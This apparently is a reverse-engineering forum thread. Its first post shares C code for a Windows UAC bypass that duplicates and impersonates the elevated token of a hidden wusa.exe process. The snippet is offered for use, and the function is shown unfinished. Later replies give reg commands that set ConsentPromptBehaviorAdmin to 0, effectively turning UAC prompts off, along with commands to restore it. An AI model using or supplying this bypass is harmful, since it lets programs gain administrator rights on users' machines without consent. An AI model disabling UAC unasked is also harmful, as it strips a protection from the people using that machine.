#1
|
|||
|
|||
Uac bypass implementation
This is an implementation of uac bypass method (Author: CIA & James Forshaw).
Works from windows 7 to latest windows 10 fall creators update. Code:
int StepOverUAC() { SECURITY_ATTRIBUTES sa; sa.nLength = sizeof(SECURITY_ATTRIBUTES); sa.bInheritHandle = TRUE; sa.lpSecurityDescriptor = NULL; if (!CreatePipe(&inRead, &inWrite, &sa, 0)) return 0; if (!CreatePipe(&outRead, &outWrite, &sa, 0)) return 0; NtSetInformationToken nt = (NtSetInformationToken)GetProcAddress(LoadLibraryA("ntdll.dll"), "NtSetInformationToken"); RtlLengthSid rts = (RtlLengthSid)GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlLengthSid"); NtFilterToken filter = (NtFilterToken)GetProcAddress(LoadLibraryA("ntdll.dll"), "NtFilterToken"); DWORD Error, bytesIO; NTSTATUS Status; HANDLE hProcessToken = NULL, hNewToken = NULL, hTest; HANDLE filterToken = NULL; BOOL bCond = FALSE; SHELLEXECUTEINFO shinfo, sh; SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY; TOKEN_MANDATORY_LABEL tml, *ptml; PSID pIntegritySid = NULL; STARTUPINFO si, si2; PROCESS_INFORMATION pi, pi2; WCHAR szBuffer[MAX_PATH]; RtlSecureZeroMemory(&shinfo, sizeof(shinfo)); shinfo.cbSize = sizeof(shinfo); shinfo.fMask = SEE_MASK_NOCLOSEPROCESS; shinfo.lpFile = L"wusa.exe"; shinfo.nShow = SW_HIDE; if (!ShellExecuteEx(&shinfo)) return 0; if (!OpenProcessToken(shinfo.hProcess, MAXIMUM_ALLOWED, &hProcessToken)) return 0; TerminateProcess(shinfo.hProcess, -1); WaitForSingleObject(shinfo.hProcess, -1); if (!DuplicateTokenEx(hProcessToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hNewToken)) return 0; if (!AllocateAndInitializeSid(&MLAuthority, 1, SECURITY_MANDATORY_MEDIUM_RID,0, 0, 0, 0, 0, 0, 0, &pIntegritySid)) return 0; tml.Label.Attributes = SE_GROUP_INTEGRITY; tml.Label.Sid = pIntegritySid; Status = nt(hNewToken, TokenIntegrityLevel, &tml, sizeof(tml)); if (!NT_SUCCESS(Status)) return 0; filter(hNewToken, 0x4, NULL, NULL, NULL, &filterToken); if (!ImpersonateLoggedOnUser(filterToken)) return 0; } |
#2
|
|||
|
|||
See this post for the latest developments in UAC Bypass updated just 3 days ago in our sister forum :
Windows 10 Redstone 1/2 UAC changes |
#4
|
|||
|
|||
even very hot & latest w10?
|
#5
|
|||
|
|||
there is nothing hot about it :P
|
#6
|
||||
|
||||
how to restore UAC in 1st or 2nd position with an exe or with regfile ?
sometime I telework on windows in other languages and is difficult to find UAC and restore back to normal. Thanks!
__________________
Decode and Conquer |
#7
|
|||
|
|||
to turn off uac completely:
Code:
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 Code:
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 5 Last edited by 0xall0c; 03-20-2018 at 15:46. Reason: corrected double shashes, which are not needed in case running from cmd |
The Following User Says Thank You to 0xall0c For This Useful Post: | ||
niculaita (03-20-2018) |
#8
|
||||
|
||||
in cmd
C:\Users\Nicolae>reg ADD / HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 ERROR: Invalid key name. Type "REG ADD /?" for usage. maybe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /f and REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t reg_dword /d 5 /f what is /f for ?
__________________
Decode and Conquer |
#9
|
|||
|
|||
/f makes sure to overwrite if the specified key value already exists, without prompting the user.
|
The Following User Says Thank You to 0xall0c For This Useful Post: | ||
niculaita (03-21-2018) |
Thread Tools | |
Display Modes | |
|
|
Similar Threads | ||||
Thread | Thread Starter | Forum | Replies | Last Post |
Armadilled Programs with Custom Implementation | TmC | General Discussion | 3 | 05-15-2006 08:58 |
Implementation of a TrustedFlow System Prototype | redbull | General Discussion | 0 | 06-24-2005 21:57 |